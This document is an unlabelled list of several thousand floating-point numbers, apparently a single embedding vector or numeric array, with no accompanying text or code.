-0.02857770211994648, 0.005201349500566721, -0.04800102859735489, 0.03646889328956604, 0.0063010635785758495, -0.01764000579714775, -0.023272324353456497, -0.013300593942403793, -0.02496647834777832, -0.037360552698373795, 0.017937226220965385, -0.020954009145498276, 0.010268950834870338, 0.004978434648364782, -0.030316438525915146, 0.0310000441968441, 0.017015844583511353, 0.0062453350983560085, -0.05656096339225769, -0.04083802551031113, 0.03373446688055992, -0.01052158698439598, -0.0290681142359972, 0.00007442109927069396, -0.04193773865699768, 0.010974847711622715, 0.0024204852525144815, -0.010751932859420776, -0.017625145614147186, -0.024594953283667564, 0.010372977703809738, 0.03135670721530914, 0.04250245913863182, -0.019571935757994652, 0.02012179233133793, 0.045742154121398926, 0.00839646439999342, -0.02602160908281803, 0.018665414303541183, -0.030524492263793945, 0.02594730444252491, -0.03608250617980957, -0.025754110887646675, -0.00001481020444771275, 0.01798180863261223, 0.022172611206769943, -0.0061190165579319, 0.02538258582353592, 0.0009134870488196611, -0.016465986147522926, 0.027151046320796013, 0.017937226220965385, -0.0591764971613884, 0.0023721870966255665, -0.011903660371899605, 0.0203001257032156, -0.014704958535730839, -0.012914208695292473, 0.0037412564270198345, 0.007597685791552067, 0.019170688465237617, -0.0006998601602390409, 0.017060426995158195, 0.00412021204829216, 0.03144587576389313, -0.005517146084457636, -0.006810052786022425, -0.0346558503806591, 0.004227954428642988, -0.009265832602977753, 0.004235384985804558, -0.0226481631398201, 0.04119468852877617, -0.019378742203116417, -0.04021386429667473, -0.016049878671765327, 0.010016313754022121, -0.011420677416026592, 0.007816885598003864, 0.011041722260415554, -0.020106932148337364, 0.014890721067786217, -0.006204467266798019, 0.0013904322404414415, -0.014883290976285934, 0.04699048027396202, -0.0010857817251235247, -0.03195114806294441, -0.012891916558146477, -0.03421001881361008, 0.017194176092743874, -0.005182773340493441, -0.02584327757358551, 0.003213691059499979, -0.015135928057134151, 0.028949227184057236, -0.03504223749041557, 0.0012037409469485283, 0.027686040848493576, -0.02132553420960903, 0.007493658922612667, 0.0026898407377302647, -0.07822830229997635, -0.010737071745097637, 0.008478200063109398, 0.009956869296729565, -0.044969383627176285, 0.003923303913325071, 0.036201395094394684, -0.030004357919096947, -0.007779733277857304, 0.018085835501551628, -0.02612563595175743, -0.010306103155016899, -0.001895706169307232, 0.013716702349483967, -0.03022727183997631, 0.017090149223804474, 0.02226177603006363, 0.024535508826375008, -0.016882095485925674, -0.018145279958844185, 0.011175471358001232, 0.04666353762149811, -0.010090618394315243, -0.004354272969067097, -0.028741171583533287, 0.027998123317956924, 0.009652218781411648, -0.03036102093756199, 0.008173549547791481, 0.022767050191760063, 0.013724132440984249, -0.010618183761835098, 0.028057565912604332, 0.01862083189189434, -0.014415169134736061, -0.03730110824108124, 0.03780638054013252, 0.0010969274444505572, -0.011955673806369305, -0.0011396529152989388, 0.00725959800183773, -0.01588640734553337, -0.03033129870891571, 0.020954009145498276, -0.018457360565662384, -0.0289640873670578, 0.04696075618267059, -0.014489473775029182, -0.0022923091892153025, -0.006940086372196674, -0.024520648643374443, 0.007653414737433195, 0.04077858105301857, 0.00260810530744493, -0.004688645247370005, 0.001370927202515304, -0.0020229534711688757, 0.02759687602519989, -0.019022079184651375, 0.010685058310627937, -0.009473887272179127, -0.018843747675418854, -0.009741384536027908, -0.028666866943240166, -0.03221864625811577, -0.010105479508638382, -0.0004955214681103826, 0.008626810275018215, -0.05382654070854187, -0.0034681856632232666, -0.013092540204524994, 0.03923303633928299, 0.013330316171050072, -0.012773028574883938, -0.05599624663591385, -0.0008178193820640445, -0.02202400006353855, -0.012074561789631844, -0.02163761481642723, -0.018977496773004532, -0.020448734983801842, -0.002507793717086315, -0.017372507601976395, 0.01977998949587345, -0.01753597892820835, -0.007151855621486902, 0.020493317395448685, -0.048090193420648575, -0.008894307538866997, -0.029796304181218147, -0.025887859985232353, -0.007255882956087589, 0.015195371583104134, -0.04684187099337578, -0.010387838818132877, 0.0029591964557766914, -0.04372106119990349, -0.004748089239001274, -0.033258914947509766, 0.006850920617580414, 0.03994636610150337, -0.03866831958293915, 0.006252765189856291, 0.0497843474149704, -0.054331813007593155, 0.023584404960274696, 0.014994747936725616, -0.01798180863261223, -0.004517743829637766, -0.015693215653300285, -0.0038787208031862974, -0.048654910176992416, -0.050616562366485596, 0.023450655862689018, 0.016718624159693718, -0.003559209406375885, -0.01222317200154066, 0.025887859985232353, 0.002231007441878319, -0.005847803317010403, 0.0075159501284360886, -0.028978947550058365, 0.009585344232618809, -0.02099859155714512, 0.019408464431762695, -0.010246658697724342, 0.0010244800942018628, 0.04990323632955551, -0.020077209919691086, 0.03744971752166748, -0.0007885617669671774, -0.027968401089310646, 0.0030855149962008, -0.046544648706912994, 0.012334628961980343, -0.0031226675491780043, 0.002741854405030608, -0.013062817975878716, 0.0001172625707113184, 0.002767861122265458, 0.011524705216288567, 0.012141436338424683, 0.008760559372603893, 0.005844087805598974, -0.003637229558080435, -0.0011312935966998339, -0.034447796642780304, 0.05558013543486595, -0.03804415836930275, -0.029187003150582314, -0.01875458098948002, -0.026809241622686386, 0.025650084018707275, 0.02359926700592041, -0.033645302057266235, 0.004528889432549477, -0.04169996455311775, -0.009875133633613586, -0.002797583118081093, -0.036558058112859726, 0.029989495873451233, 0.03412085399031639, -0.02251441404223442, 0.039114151149988174, -0.023019688203930855, -0.029112696647644043, -0.008322159759700298, 0.06473451107740402, -0.0069921002723276615, -0.04586104303598404, 0.01122005470097065, 0.041224412620067596, -0.009889994747936726, -0.004840970505028963, 0.009236111305654049, -0.034447796642780304, -0.01970568485558033, 0.012141436338424683, -0.014214545488357544, -0.009659649804234505, 0.020523039624094963, 0.034982793033123016, 0.010179784148931503, -0.014459752477705479, 0.01802639104425907, 0.013731563463807106, 0.0041127814911305904, -0.018487082794308662, -0.002957338932901621, 0.005780928768217564, 0.05287543684244156, 0.014920443296432495, -0.007556817959994078, 0.014296281151473522, -0.014823846518993378, -0.01003117486834526, 0.0019690822809934616, -0.011576718650758266, 0.01274330634623766, 0.011859077028930187, 0.007437929976731539, 0.02331690676510334, -0.013137123547494411, 0.01689695566892624, 0.016317376866936684, -0.03626083955168724, -0.0037319683469831944, 0.023970792070031166, 0.0070181069895625114, 0.033853355795145035, -0.02293052151799202, -0.04256189987063408, -0.019304437562823296, -0.026185080409049988, -0.009354999288916588, 0.0072670285589993, 0.0025356579571962357, 0.04413716867566109, -0.024000514298677444, -0.004974719602614641, -0.011807063594460487, -0.02997463569045067, -0.04681214690208435, 0.003373446874320507, 0.016243072226643562, -0.039114151149988174, 0.0007416567532345653, 0.029796304181218147, -0.035785287618637085, 0.0018938485300168395, 0.0036409448366612196, -0.018279029056429863, -0.0526079386472702, 0.003492334857583046, 0.028102150186896324, 0.008195840753614902, -0.011777341365814209, 0.01942332647740841, -0.024178845807909966, -0.005004441365599632, 0.020523039624094963, 0.03747944161295891, 0.04621770605444908, -0.039292480796575546, 0.0018631977727636695, -0.005717769265174866, -0.013560662046074867, 0.01830875128507614, 0.017699450254440308, -0.008924029767513275, 0.0017647437052801251, 0.020404152572155, -0.024565231055021286, 0.00413878820836544, -0.010246658697724342, -0.011918521486222744, 0.003889866638928652, -0.04098663479089737, -0.004670069087296724, -0.028429090976715088, 0.027165906503796577, -0.02058248408138752, 0.05195405334234238, 0.015351411886513233, 0.023792460560798645, 0.04140274226665497, -0.00306879635900259, 0.016852373257279396, -0.02738882228732109, -0.049279071390628815, 0.001883631688542664, 0.03033129870891571, -0.013627536594867706, -0.03533945605158806, 0.04000581055879593, 0.02019609697163105, 0.02811701036989689, -0.001016120775602758, 0.026809241622686386, 0.000021319148800102994, 0.033675022423267365, -0.01658487506210804, -0.0286520067602396, 0.0023238887079060078, -0.0012018833076581359, -0.03608250617980957, 0.010543879121541977, -0.02411940135061741, 0.002637827303260565, -0.05715540423989296, -0.00729303527623415, -0.016570014879107475, 0.0023498954251408577, 0.008507922291755676, 0.009889994747936726, 0.00945159513503313, -0.016436265781521797, -0.03156476095318794, -0.0051121837459504604, 0.04657437279820442, 0.015975574031472206, 0.014177393168210983, -0.0032694197725504637, -0.007341333664953709, 0.022499551996588707, -0.013924756087362766, -0.003386450232937932, -0.0027994406409561634, -0.01162130106240511, 0.03747944161295891, -0.009473887272179127, 0.015767520293593407, -0.011844215914607048, 0.030524492263793945, 0.007021822035312653, -0.015856686979532242, -0.01908152364194393, 0.02514480985701084, -0.03670666739344597, 0.00046161978389136493, -0.015752658247947693, 0.017238758504390717, -0.019839433953166008, 0.03513140231370926, 0.0017833198653534055, -0.012297476641833782, -0.004543750546872616, -0.006951232440769672, -0.003057650523260236, 0.0004007825627923012, -0.005858948919922113, 0.010335824452340603, -0.004696075804531574, -0.0005182773456908762, 0.029291030019521713, 0.005769782699644566, 0.020879704505205154, -0.0008930531912483275, 0.023153437301516533, -0.004681214690208435, 0.013694411143660545, 0.0043654185719788074, -0.017209036275744438, 0.028934365138411522, -0.03762805089354515, -0.030910877510905266, 0.03349669277667999, 0.02166733704507351, 0.017209036275744438, -0.020954009145498276, -0.02241038717329502, 0.005368535872548819, -0.02542717009782791, -0.005357390269637108, -0.0010393410921096802, -0.031505316495895386, 0.013010804541409016, -0.047495752573013306, -0.011487551964819431, 0.016748346388339996, 0.013679550029337406, -0.025085367262363434, 0.00803237035870552, -0.017134731635451317, 0.034061409533023834, -0.010937695391476154, 0.005498569458723068, -0.009548191912472248, -0.0017684588674455881, -0.003648375393822789, 0.031089210882782936, 0.005721484776586294, 0.000660850084386766, 0.013293163850903511, -0.009548191912472248, 0.00314681651070714, -0.013545800931751728, 0.01578238047659397, 0.01746167428791523, -0.019973183050751686, -0.03296169638633728, -0.0007569821318611503, 0.0122900465503335, -0.006148738320916891, -0.0242680124938488, 0.01648084819316864, 0.03474501520395279, 0.0017043708357959986, 0.07044113427400589, -0.0022663024719804525, 0.020879704505205154, -0.0003977639426011592, 0.0013560662046074867, 0.01038040779531002, -0.024907033890485764, 0.010922834277153015, 0.016525430604815483, -0.04276995733380318, 0.013820729218423367, 0.020047487691044807, 0.015529744327068329, 0.03177281469106674, 0.006531408987939358, -0.024386899545788765, -0.010811377316713333, -0.0054205493070185184, -0.026957852765917778, 0.018977496773004532, 0.01237921230494976, -0.02236580289900303, -0.020627066493034363, 0.03533945605158806, 0.046901311725378036, 0.007972925901412964, -0.014422599226236343, 0.013843020424246788, 0.011108596809208393, 0.000676175463013351, -0.009696802124381065, 0.013181705959141254, -0.027507709339261055, -0.005665755830705166, 0.0005962976138107479, 0.017996670678257942, 0.02117692306637764, 0.034447796642780304, -0.026497161015868187, -0.014162532053887844, 0.0010486292885616422, 0.019646240398287773, 0.01903693936765194, -0.01541085634380579, 0.025902722030878067, 0.03843054547905922, -0.0036539481952786446, 0.006951232440769672, 0.007824315689504147, -0.014652945101261139, -0.03489362448453903, 0.001166588393971324, -0.011665884405374527, 0.0015130355022847652, -0.039322204887866974, -0.0012278900248929858, 0.0205081794410944, 0.01939360424876213, -0.001861340133473277, -0.020924286916851997, 0.00626019574701786, -0.0008480057585984468, -0.011227484792470932, -0.0026824104133993387, 0.0035870736464858055, 0.015291968360543251, -0.03064338117837906, 0.005792074371129274, -0.005182773340493441, -0.002842165995389223, -0.00045418928493745625, 0.004313405137509108, -0.03046504780650139, 0.010529018007218838, -0.007385916542261839, -0.010633044876158237, -0.022469831630587578, -0.03195114806294441, 0.020359568297863007, 0.00026238951249979436, 0.017996670678257942, 0.00509360758587718, 0.02643771842122078, -0.018219584599137306, 0.041432466357946396, -0.022781912237405777, -0.025085367262363434, 0.003960456233471632, -0.023614127188920975, -0.0003566639788914472, 0.008656531572341919, -0.008515352383255959, 0.01350121758878231, 0.010477004572749138, -0.00813639722764492, -0.010581031441688538, 0.03314002975821495, 0.004952427931129932, -0.02370329387485981, -0.00026238951249979436, -0.038727764040231705, -0.018665414303541183, 0.005509715527296066, -0.015975574031472206, 0.01355323102325201, 0.002359183505177498, -0.003254558891057968, 0.009585344232618809, -0.013211428187787533, -0.014935304410755634, -0.00007500160427298397, -0.04389939084649086, 0.009473887272179127, -0.013389760628342628, 0.006174745038151741, -0.008455908857285976, -0.01058846153318882, 0.009629927575588226, 0.009875133633613586, -0.01949763111770153, 0.005453986581414938, 0.013932187110185623, -0.02770090289413929, 0.004696075804531574, 0.009020626544952393, -0.019928600639104843, 0.015069053508341312, 0.004369133617728949, 0.003629799000918865, 0.0002930403279606253, 0.006323355250060558, -0.020344708114862442, -0.009139514528214931, -0.004930136259645224, 0.01110116671770811, 0.015841824933886528, -0.019334159791469574, 0.027359100058674812, 0.007779733277857304, 0.008857155218720436, 0.02352496236562729, -0.0399760864675045, -0.010402699001133442, -0.01573779806494713, 0.03192142769694328, -0.0316242054104805, -0.0071778628043830395, -0.013003374449908733, -0.029603110626339912, 0.010677628219127655, -0.011480121873319149, 0.032486144453287125, 0.03233753517270088, -0.0006027992931194603, 0.016451125964522362, -0.030405603349208832, 0.016153905540704727, 0.00829243753105402, 0.03331835940480232, -0.00824042409658432, -0.0004695146926678717, -0.004521458875387907, 0.019467908889055252, -0.022098306566476822, 0.009919716976583004, 0.0057400609366595745, 0.025783833116292953, 0.025115089491009712, -0.01573779806494713, -0.013828159309923649, -0.029365334659814835, 0.02377759851515293, 0.01156928762793541, -0.007512235082685947, 0.033675022423267365, -0.014207115396857262, -0.0004955214681103826, -0.001613347209058702, -0.005591450724750757, -0.024639535695314407, 0.040273308753967285, -0.015106205828487873, -0.00922125019133091, -0.03331835940480232, 0.022469831630587578, 0.026140497997403145, -0.0010207649320363998, -0.022633301094174385, 0.030524492263793945, -0.007010676432400942, -0.03373446688055992, -0.02475842460989952, -0.006598283536732197, -0.024253150448203087, -0.045177437365055084, 0.0354880653321743, -0.024327455088496208, 0.025783833116292953, -0.006360507570207119, -0.009897425770759583, 0.019259855151176453, 0.03771721571683884, -0.004465730395168066, 0.0027437119279056787, 0.0014991032658144832, -0.018219584599137306, 0.0012251036241650581, 0.003566639730706811, -0.030390743166208267, 0.0018808451713994145, -0.008418755605816841, -0.05983038246631622, -0.007898621261119843, -0.036795832216739655, -0.0008521854178979993, 0.012044839560985565, 0.03388307988643646, 0.005795789882540703, 0.0019690822809934616, -0.002611820586025715, -0.016718624159693718, 0.002470641164109111, 0.00733761815354228, 0.026452578604221344, 0.023079130798578262, -0.01064047496765852, -0.0015994150890037417, 0.04600965231657028, -0.025189394131302834, -0.006115301046520472, -0.015098774805665016, -0.010090618394315243, -0.02166733704507351, -0.02605133131146431, -0.024847591295838356, 0.004948712885379791, 0.011472691781818867, 0.007367340382188559, 0.04351300373673439, 0.028949227184057236, -0.012921638786792755, -0.006709740962833166, -0.010112909600138664, 0.012899347580969334, 0.008359312079846859, -0.0037895548157393932, -0.0003661843074951321, -0.011004569940268993, 0.03236725553870201, -0.005732630379498005, -0.00621561286970973, -0.005977836903184652, 0.002966627012938261, 0.015470299869775772, -0.01591612957417965, -0.03302114084362984, 0.0012186019448563457, -0.014177393168210983, -0.03530973568558693, -0.024178845807909966, 0.01686723344027996, 0.008767989464104176, -0.02362898923456669, -0.03331835940480232, -0.010855959728360176, -0.01351607870310545, 0.023747876286506653, 0.031059488654136658, -0.012029978446662426, -0.004978434648364782, -0.0009919716976583004, 0.03236725553870201, 0.013226289302110672, -0.07894162833690643, 0.012067131698131561, -0.01949763111770153, -0.011918521486222744, -0.017803477123379707, 0.004354272969067097, 0.027923816815018654, -0.05067600682377815, -0.031861983239650726, 0.03215920180082321, 0.03881692886352539, -0.002793867839500308, -0.018457360565662384, -0.02924644574522972, -0.007211299613118172, -0.013738993555307388, -0.00313009787350893, 0.03474501520395279, -0.025189394131302834, 0.003717107465490699, -0.018175002187490463, 0.031861983239650726, 0.0003222979139536619, 0.007434214930981398, 0.02532314322888851, 0.020136654376983643, -0.005509715527296066, 0.0005224570049904287, -0.038341376930475235, -0.022113166749477386, -0.0025430885143578053, -0.04152163118124008, -0.0011907375883311033, 0.02117692306637764, 0.06443729251623154, 0.012542683631181717, -0.009667079895734787, -0.03281308710575104, 0.012111714109778404, -0.0074862283654510975, -0.0312080979347229, -0.03495306894183159, 0.011130888015031815, -0.0005884026759304106, 0.003040931886062026, 0.003908442799001932, -0.008582226932048798, 0.013099970296025276, 0.012208310887217522, 0.02942477911710739, 0.008879447355866432, 0.006468249950557947, 0.004213093314319849, -0.009005765430629253, -0.03982747718691826, -0.01732792519032955, 0.015663493424654007, 0.028845198452472687, -0.018323611468076706, 0.0008935175719670951, 0.002466925885528326, 0.0023628987837582827, -0.0142219765111804, -0.012453516945242882, -0.01145039964467287, -0.014363155700266361, -0.017550839111208916, -0.003562924452126026, -0.012163727544248104, -0.01156928762793541, 0.018992356956005096, -0.019408464431762695, -0.01120519358664751, -0.0026638340204954147, 0.025367725640535355, 0.004495452158153057, 0.02334662899374962, -0.020493317395448685, -0.01934901997447014, 0.006003843620419502, 0.03221864625811577, -0.044582996517419815, -0.013404620811343193, -0.022707607597112656, -0.019973183050751686, -0.01341205183416605, 0.008054661564528942, 0.035606954246759415, 0.020210959017276764, -0.014645515009760857, 0.02429773285984993, -0.017699450254440308, -0.013241150416433811, -0.012951361015439034, 0.014043644070625305, -0.019571935757994652, 0.012267754413187504, 0.01833847351372242, -0.015455438755452633, -0.011435538530349731, -0.005535722244530916, 0.01710500940680504, 0.028027843683958054, -0.002661976497620344, -0.02016637660562992, -0.006252765189856291, -0.0018706282135099173, 0.03144587576389313, -0.030212411656975746, 0.005758637096732855, -0.00020898280490655452, 0.0006826771423220634, -0.025991886854171753, -0.011881369166076183, 0.009652218781411648, -0.02163761481642723, -0.01044728234410286, 0.025204254314303398, -0.019408464431762695, -0.029157280921936035, 0.007044113706797361, -0.011004569940268993, 0.01875458098948002, -0.000017139491319539957, -0.005728915333747864, -0.0040867747738957405, 0.0006952161202207208, 0.03857915475964546, -0.029959773644804955, 0.017209036275744438, -0.01924499310553074, -0.02679438143968582, 0.006973523646593094, 0.004436008166521788, 0.03102976642549038, -0.027017297223210335, 0.0019133536843582988, -0.009934578090906143, -0.005353674758225679, 0.010462143458425999, 0.011249775998294353, -0.005892386194318533, -0.019661102443933487, 0.025338003411889076, -0.0015000321436673403, -0.007735149934887886, 0.01115318015217781, 0.00258209859021008, 0.007289320230484009, -0.017610283568501472, 0.0005860806559212506, 0.018323611468076706, -0.015693215653300285, -0.021607892587780952, 0.01160643994808197, 0.049071017652750015, -0.003291711211204529, -0.0296922754496336, 0.004105350933969021, -0.009421873837709427, 0.012557544745504856, -0.0012548256199806929, -0.004510313272476196, 0.018368195742368698, -0.03471529483795166, 0.02197941765189171, 0.01044728234410286, 0.04271051287651062, -0.02055276185274124, -0.008849725127220154, 0.0036836701910942793, 0.00005842810787726194, -0.019571935757994652, 0.010907973162829876, -0.007359909825026989, -0.018918052315711975, -0.0248921737074852, 0.007032967638224363, -0.02819131501019001, -0.028325064107775688, -0.0142739899456501, -0.0026731223333626986, 0.010789085179567337, -0.005130759906023741, -0.0060670031234622, -0.007051544263958931, 0.03352641314268112, -0.025471752509474754, -0.003434748388826847, 0.0406002514064312, -0.025694668292999268, 0.011457830667495728, 0.0013077679323032498, -0.02142956107854843, -0.03242669999599457, -0.01689695566892624, -0.00514562102034688, -0.006772900465875864, 0.019646240398287773, -0.030732546001672745, 0.010885681957006454, 0.016465986147522926, -0.0016820793971419334, 0.011911090463399887, 0.00626762630417943, -0.02104317396879196, -0.009637357667088509, 0.013285732828080654, -0.017580561339855194, -0.018591109663248062, -0.012007687240839005, 0.006490541156381369, 0.10158979147672653, -0.01630251668393612, 0.0032434130553156137, -0.019928600639104843, 0.002847739029675722, 0.008753128349781036, 0.003867574967443943, 0.015336550772190094, -0.011049153283238411, -0.007504804525524378, 0.026883548125624657, -0.019408464431762695, -0.019259855151176453, 0.007802024483680725, 0.022380664944648743, -0.000764412630815059, -0.009889994747936726, -0.01921527273952961, 0.034239742904901505, -0.009927147068083286, 0.025932444259524345, -0.005546867847442627, 0.0148461377248168, -0.020835120230913162, 0.02545689232647419, -0.0019077807664871216, -0.034804459661245346, -0.021578170359134674, -0.012951361015439034, -0.01581210270524025, -0.006297348532825708, -0.00102540897205472, -0.012951361015439034, -0.011405817233026028, 0.000331586052197963, 0.0013486356474459171, 0.02142956107854843, 0.008307298645377159, -0.03379391133785248, -0.0036762396339327097, 0.0033883077558130026, -0.003979032393544912, -0.01970568485558033, -0.01120519358664751, 0.02465439774096012, -0.012460947968065739, 0.04779297485947609, 0.0024966478813439608, -0.018576249480247498, -0.012260324321687222, 0.0023796174209564924, -0.013040526770055294, 0.03646889328956604, 0.021815946325659752, 0.01875458098948002, 0.028934365138411522, 0.01252039149403572, -0.0051270448602736, -0.008515352383255959, -0.02230636030435562, -0.01048443466424942, 0.012773028574883938, -0.007538241799920797, -0.0014405881520360708, 0.02685382589697838, -0.016748346388339996, -0.038103602826595306, -0.00407562917098403, -0.021295811980962753, 0.030732546001672745, 0.006966093555092812, 0.011123457923531532, -0.004402570892125368, -0.010989708825945854, 0.022603578865528107, 0.00718900840729475, 0.015440578572452068, 0.02878575585782528, -0.014712389558553696, -0.017506256699562073, 0.022113166749477386, 0.030197549611330032, 0.004279967863112688, 0.0289640873670578, -0.014125379733741283, 0.028800616040825844, -0.009080070070922375, -0.0071630016900599, -0.002466925885528326, 0.001882702810689807, 0.005676901899278164, 0.0028681729454547167, 0.020954009145498276, -0.0016765064792707562, 0.0054874238558113575, 0.02542717009782791, 0.021786224097013474, -0.0068211983889341354, -0.012037409469485283, -0.015559466555714607, 0.005037878639996052, -0.01717931590974331, 0.023941069841384888, -0.004194517154246569, 0.0009120938484556973, 0.009020626544952393, -0.011405817233026028, 0.015381134115159512, 0.0072150151245296, -0.023376351222395897, -0.03525029122829437, -0.01973540708422661, 0.012609558179974556, -0.01145039964467287, -0.007861468940973282, 0.03866831958293915, 0.005643464624881744, -0.013226289302110672, -0.019482769072055817, -0.03302114084362984, -0.008076952770352364, -0.029112696647644043, 0.04835769161581993, -0.01865055412054062, -0.00029489793814718723, 0.002935047261416912, -0.005695478059351444, -0.013746424578130245, 0.023361491039395332, 0.016703763976693153, 0.02300482615828514, 0.003982747904956341, 0.008849725127220154, -0.023926207795739174, 0.011576718650758266, -0.030004357919096947, 0.02370329387485981, 0.015113635919988155, 0.006052142009139061, -0.007705428171902895, -0.014318572357296944, 0.02377759851515293, 0.02770090289413929, -0.003845283528789878, 0.011190332472324371, -0.004941282328218222, 0.007255882956087589, 0.001954221399500966, 0.0059926980175077915, 0.03340752795338631, -0.0019300723215565085, -0.022187471389770508, 0.01023922860622406, 0.019661102443933487, -0.008166119456291199, 0.01563377119600773, 0.010462143458425999, -0.019363882020115852, -0.0009873276576399803, 0.0005661111790686846, 0.0049932957626879215, 0.0001938896020874381, 0.015381134115159512, -0.0007997075445018709, -0.008359312079846859, 0.028384508565068245, 0.007467652205377817, -0.05091378465294838, -0.02163761481642723, -0.027953539043664932, -0.0017350215930491686, -0.001207456225529313, -0.00834445096552372, -0.002912755822762847, 0.02674979902803898, -0.006657727528363466, 0.0007476939936168492, 0.026244524866342545, 0.022499551996588707, -0.03379391133785248, 0.007861468940973282, 0.01973540708422661, 0.02646743878722191, 0.019928600639104843, 0.008886877447366714, -0.028235899284482002, -0.007839176803827286, 0.003767263377085328, -0.021756501868367195, 0.011903660371899605, 0.017476534470915794, 0.051211003214120865, -0.008767989464104176, -0.013337747193872929, -0.003291711211204529, -0.016347099095582962, -0.021474143490195274, -0.0009789683390408754, -0.01362010557204485, 0.023361491039395332, 0.0065797073766589165, -0.014504334889352322, 0.0005252434639260173, 0.0016059167683124542, -0.0020136653911322355, -0.025115089491009712, 0.003364158794283867, 0.01232719887048006, -0.002845881273970008, -0.006037280894815922, -0.0070589748211205006, 0.01064047496765852, 0.006587137933820486, -0.020924286916851997, -0.013917325995862484, -0.002316458150744438, 0.0022347227204591036, -0.007129564415663481, 0.007891190238296986, -0.002316458150744438, 0.0031839690636843443, 0.024803007021546364, 0.00911722332239151, 0.007129564415663481, -0.0022663024719804525, 0.0026768373791128397, 0.04057052731513977, -0.04015441983938217, -0.0028886066284030676, -0.0011684460332617164, -0.02362898923456669, -0.013114831410348415, -0.016436265781521797, 0.009124653413891792, -0.01640654355287552, -0.025011060759425163, 0.025813555344939232, 0.005650894716382027, -0.012706154026091099, -0.012787889689207077, 0.0033660163171589375, 0.0011080732801929116, -0.017238758504390717, 0.015039331279695034, -0.005398258101195097, -0.0002461352851241827, -0.0017888927832245827, -0.009340138174593449, -0.0069809542037546635, 0.019661102443933487, -0.004811248276382685, -0.0021901398431509733, 0.005669471342116594, -0.006687449757009745, -0.013404620811343193, 0.020493317395448685, 0.017313063144683838, -0.002245868556201458, 0.02903839200735092, 0.004874407779425383, 0.011064013466238976, -0.017402229830622673, -0.01262441836297512, 0.005940684583038092, -0.014125379733741283, 0.018784303218126297, 0.0019040654879063368, -0.0029164711013436317, 0.013107401318848133, 0.010306103155016899, 0.012527822516858578, 0.0005201349849812686, 0.006847205571830273, -0.00044304353650659323, -0.020849982276558876, -0.011888799257576466, 0.00844847783446312, -0.02226177603006363, -0.0020489601884037256, 0.0014210829976946115, -0.026601187884807587, 0.07406722009181976, -0.007839176803827286, -0.027403682470321655, -0.007720289286226034, -0.05070573091506958, -0.015455438755452633, -0.019973183050751686, -0.010566170327365398, -0.01053644809871912, -0.0018148995004594326, 0.007382201496511698, -0.013293163850903511, -0.031148653477430344, 0.04657437279820442, 0.0033251484856009483, -0.020701371133327484, 0.013701841235160828, -0.010261519812047482, 0.018591109663248062, 0.003867574967443943, 0.04229440540075302, 0.017996670678257942, 0.009830551221966743, -0.02465439774096012, 0.008545074611902237, -0.007854037918150425, -0.019586797803640366, 0.01116804126650095, -0.028027843683958054, 0.009540761820971966, -0.0018260452197864652, -0.0017944657010957599, -0.03958970308303833, -0.01048443466424942, -0.00950360856950283, -0.005814366042613983, 0.005665755830705166, -0.008017509244382381, 0.00030929455533623695, 0.007943203672766685, -0.01694153994321823, -0.006605714093893766, -0.018665414303541183, -0.021593032404780388, 0.017268480733036995, 0.002126980572938919, 0.0030130676459521055, -0.009711663238704205, -0.020359568297863007, 0.022142888978123665, 0.009347568266093731, 0.027359100058674812, 0.005435410421341658, 0.020716233178973198, -0.0050861770287156105, 0.012862194329500198, 0.01686723344027996, -0.011576718650758266, -0.013107401318848133, -0.02391134761273861, 0.02752256952226162, -0.008507922291755676, 0.01743195205926895, 0.008990904316306114, -0.0019244994036853313, -0.007668275386095047, 0.00399017846211791, 0.015031900256872177, -0.019750267267227173, -0.021934835240244865, 0.0011972392676398158, -0.00422423891723156, 0.03926276043057442, -0.007757441606372595, -0.0067023104056715965, 0.009793398901820183, 0.036736391484737396, 0.01367211900651455, -0.02177136391401291, -0.023376351222395897, 0.0012585408985614777, -0.01346406526863575, -0.008812572807073593, 0.012854764237999916, -0.0004579045344144106, 0.011301789432764053, 0.008262715302407742, 0.015277107246220112, -0.023331768810749054, -0.0038341376930475235, 0.018397916108369827, 0.014898152090609074, 0.00945159513503313, -0.0011238630395382643, -0.008723406121134758, 0.01949763111770153, -0.00028073356952518225, -0.0038081309758126736, 0.040511082857847214, 0.007876329123973846, -0.0076459841802716255, 0.005873810034245253, 0.0074230688624084, -0.035785287618637085, 0.002922043902799487, -0.009444165043532848, 0.014229406602680683, -0.005498569458723068, -0.012899347580969334, 0.014890721067786217, -0.005717769265174866, 0.01655515283346176, 0.02573925070464611, 0.023822180926799774, 0.011368663981556892, -0.018501944839954376, -0.0055803051218390465, -0.018457360565662384, 0.01560404896736145, -0.0000010122604408024927, -0.008567365817725658, 0.0014860999071970582, 0.008946321904659271, 0.026705214753746986, 0.023079130798578262, 0.004142503719776869, -0.0006227687699720263, 0.04021386429667473, -0.02096886932849884, 0.015247385017573833, -0.0027511424850672483, 0.008879447355866432, -0.02997463569045067, -0.027507709339261055, -0.006969808600842953, -0.0010737072443589568, 0.002335034543648362, 0.0025635224301368, -0.016183627769351006, 0.013367468491196632, -0.017907503992319107, -0.017090149223804474, -0.016361959278583527, 0.009942008182406425, -0.009652218781411648, 0.012000257149338722, -0.0032434130553156137, -0.015693215653300285, -0.003941880073398352, 0.006096724886447191, 0.01160643994808197, 0.026095913723111153, -0.0036130803637206554, -0.0020489601884037256, -0.0008229278028011322, -0.013961908407509327, -0.004922706168144941, 0.002427915809676051, -0.007430499419569969, 0.025293421000242233, -0.01854652725160122, -0.008359312079846859, -0.0009051277302205563, -0.018501944839954376, -0.02016637660562992, -0.027017297223210335, -0.023658711463212967, -0.025471752509474754, 0.014065935276448727, 0.017313063144683838, 0.014838707633316517, 0.007148140575736761, 0.01640654355287552, 0.00714442552998662, -0.010439852252602577, 0.0006947517395019531, 0.005825511645525694, -0.017506256699562073, 0.01774403266608715, 0.00401618517935276, -0.021593032404780388, 0.027165906503796577, -0.0004871621204074472, 0.012007687240839005, 0.017134731635451317, -0.022484691813588142, 0.008938890881836414, -0.0009473887039348483, -0.010997138917446136, 0.02429773285984993, -0.013070248998701572, 0.023510100319981575, 0.0025616646744310856, -0.011695606634020805, -0.022633301094174385, -0.015826964750885963, -0.014184823259711266, -0.001273401896469295, -0.02128094993531704, 0.019051801413297653, 0.003222979139536619, -0.01686723344027996, 0.009823120199143887, -0.0020266687497496605, 0.021697059273719788, 0.0017470961902290583, 0.01550002209842205, 0.0063270702958106995, 0.01802639104425907, 0.005591450724750757, 0.013241150416433811, -0.005788359325379133, -0.005884955637156963, 0.027463126927614212, 0.022871077060699463, 0.014006491750478745, 0.021236367523670197, -0.0010987850837409496, -0.01120519358664751, -0.0034626128617674112, -0.01679292879998684, 0.004406286403536797, 0.00092788360780105, 0.002626681700348854, 